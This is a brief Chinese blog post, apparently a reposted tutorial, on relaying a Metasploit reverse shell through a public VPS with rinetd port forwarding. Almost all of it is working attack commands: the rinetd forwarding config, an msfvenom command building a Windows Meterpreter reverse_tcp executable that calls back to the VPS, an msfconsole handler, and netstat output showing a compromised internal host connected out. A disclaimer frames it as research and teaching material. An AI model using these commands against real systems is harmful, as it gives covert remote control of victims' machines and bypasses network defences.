- 本地
metasploit
机器: 192.168.3.23
- 公网VPS: 181.122.37.15
- 内网靶机: 192.168.109.143
1 2 3
|
vim /etc/rinetd.conf 0.0.0.0 8022 127.0.0.1 8201 rinetd -c /etc/rinetd.conf
|
1 2 3
|
msfvenom -p windows/meterpreter/reverse_tcp LHOST=181.122.37.15 lport=8022 -f exe >181.122.37.15_8022.exe
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set lhost 192.168.3.23;set lport 8201;run -j"
|
1
|
TCP 192.168.109.143:49776 181.122.37.15:8022 ESTABLISHED 3128
|
FROM :WOLVEZ'S BLOG| Author:wolve
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
https://cn-sec.com/archives/1012619.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论